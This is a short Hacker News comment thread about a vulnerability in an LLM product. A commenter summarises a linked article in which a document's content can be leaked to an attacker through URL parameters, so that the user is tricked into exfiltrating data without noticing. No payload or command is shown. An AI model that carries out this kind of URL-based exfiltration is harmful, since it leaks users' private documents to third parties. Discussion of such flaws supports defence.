Hacker News new | past | comments | ask | show | jobs | submit login

The vuln is that a user can be tricked into exfiltrating data without it being obvious.





But what "data"? LLMs don't know anything except whatever they were trained on, right?

The article describes how the content of a document (which in theory should only be sent to OpenAI) can be exfiltrated to an attacker via URL parameters.



Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: